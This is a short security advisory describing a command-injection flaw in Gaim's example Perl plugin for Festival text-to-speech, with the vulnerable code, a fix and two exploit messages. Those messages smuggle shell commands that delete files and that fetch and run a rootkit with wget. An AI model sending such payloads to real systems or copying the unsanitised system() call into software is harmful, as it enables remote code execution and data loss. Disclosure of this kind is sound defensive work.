|
Brought to you by:
Suppliers of:
|
|
|
| |
| Gaim is an all-in-one IM client that resembles AIM. Gaim lets you use AIM, ICQ, Yahoo, MSN, IRC, Jabber, Napster, Zephyr, and Gadu-Gadu, all at once. Gaim is NOT endorsed by or affiliated with AOL, Yahoo, MSN, or Napster. An example plugin provided by Gaim (which many copy-paste from) allows remote attackers to cause it to execute arbitrary code. |
| |
Credit:
The information has been provided by error.
|
| |
A vulnerability exists in any plugin that has copied its code from the example plugin to execute arbitrary code.
Vulnerable code (from the example plugin):
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
As you can see the system command is executed without adequate attention to the user provided input.
Exploit:
Just pass the plugin any of these messages (or really any message for that matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x rootkit;./rootkit
Solution:
A fixed version of the example plugin would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
$string =~ s/[^\w]//g;
system("echo \"$string\" | /usr/bin/festival --tts");
}
|
|
|
|
|
